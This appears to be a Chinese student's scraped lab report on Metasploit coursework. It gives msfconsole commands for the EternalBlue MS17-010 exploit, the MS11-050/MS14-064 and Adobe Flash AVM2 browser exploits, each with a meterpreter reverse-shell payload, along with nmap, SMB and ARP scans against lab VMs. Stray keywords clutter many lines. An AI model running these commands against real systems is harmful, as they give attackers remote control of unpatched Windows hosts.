##任務一:MS17-010安全漏洞 ##任務二:(1)MS11-050(失敗)(2)MS14-064(惟一) ##任務三:abode_flash_avm2 ##輔助模塊:(1)ARP掃描模塊(惟一)(2)auxiliary/scanner/smb/smb_ms17_010 (掃描靶機是否會被此漏洞攻擊)(3)nmap掃描靶機開放端口(惟一)html
#1. 實踐內容(3.5分) 本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成: 1.1一個主動攻擊實踐,如ms08_067; (1分) 1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分) 1.3 一個針對客戶端的攻擊,如Adobe;(1分) 1.4 成功應用任何一個輔助模塊。(0.5分) 以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分shell
#問題回答 ####用本身的話解釋什麼是 exploit , payload , encode. exploit: 設至關於利用漏洞打開的通道,將作好的木馬病毒等順利傳輸到靶機。 payload: 簡單來講就是病毒代碼包裝成一個可執行的文件(任意指定類型),而後經過通道傳輸爲獲取靶機權限作準備。 encode: 針對payload進行編碼,改變payload代碼特徵(例如不出現「0x00」的特殊機器碼等),可是不改變payload爲咱們所用的特徵,能對payload進行加工。windows
##<span style="color :red">本次實踐所用的輔助功能及漏洞:nmap掃描,auxiliary輔助模塊,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2</span>瀏覽器
#1、Windows服務滲透攻擊——MS17-010安全漏洞 ####(1)打開MSF輸入nmap -O -Pn 192.168.239.129
####(2)利用auxiliary輔助模塊進行掃描:安全
msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129 msf auxiliary(scanner/smb/smb_ms17_010) > run
####(3)根據要求設置並攻擊: 輸入back
退回,而後依次輸入:網絡
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.239.131 set RHOST 192.168.239.129 exploit
#2、瀏覽器滲透攻擊——MS11-050/MS14-064 ####(1) 打開MSF,依次輸入:session
use windows/browser/ms11_050_mshtml_cobjectelement set payloadwindows/meterpreter/reverse_http set LHOST 192.168.239.131 set LPORT 5313 exploit
在靶機上打開生成的URL,發現報錯,猜想多是漏洞和IE版本問題
tcp
####(2)從新選擇: 主要步驟和(1)中大體相同,就是修改一下調用的名稱。注意:<span style="color :yellow">須要添加的指令AllowPowershellprompt---true並將http連接改爲tcp連接
</span> 編碼
生成URL並開啓監聽服務: spa
靶機打開IE瀏覽器,輸入網址:
攻擊機回連成功,輸入sessions -i獲取對話:
#3、針對Adobe Reader軟件的滲透攻擊——abode_flash_avm2 ####(1)生成PDF文件沒有成功(上一屆學長學姐的經驗並很差用) ####(2)利用abode_flash_avm2攻擊:
(1)輸入search abode
(2)根據要求進行配置:
use exploit/windows/browser/abode_flash_avm2 set srvhost 192.168.239.131 set lhost 192.168.239.131 set payloadwindows/meterpreter/reverse_tcp
(3)在靶機裏下載adobe_flash_11。
(4)輸入exploit:
(5)在靶機裏登陸生成出來的地址:
(6)獲取權限:
#4、輔助模塊——ARP掃描模塊 ####網絡安全協議中曾經講到過ARP欺騙,因而我便嘗試了ARP掃描 (1)seach
尋找模塊:
(2)根據要求配置: 第一次掃描的是一個網段(設置及結果以下):
第二次掃描靶機:
本次試驗在我看來爲漏洞尋找合適的靶機是一件很費時間的事情,須要足夠的耐心,第二就是如何正確利用MSF的輔助功能爲攻擊作好鋪墊,仍然須要大量反覆的實踐,否則所掌握的東西僅僅知識一點點皮毛而已。同時我發現想要利用一個漏洞進行攻擊也不是一件容易的事情,由於一個漏洞不可能對全部狀況都適用,因此攻擊方不只僅是要找合適的漏洞,也要爲漏洞找合適的機器或程序。矛和盾的較量看來還要持續好久好久。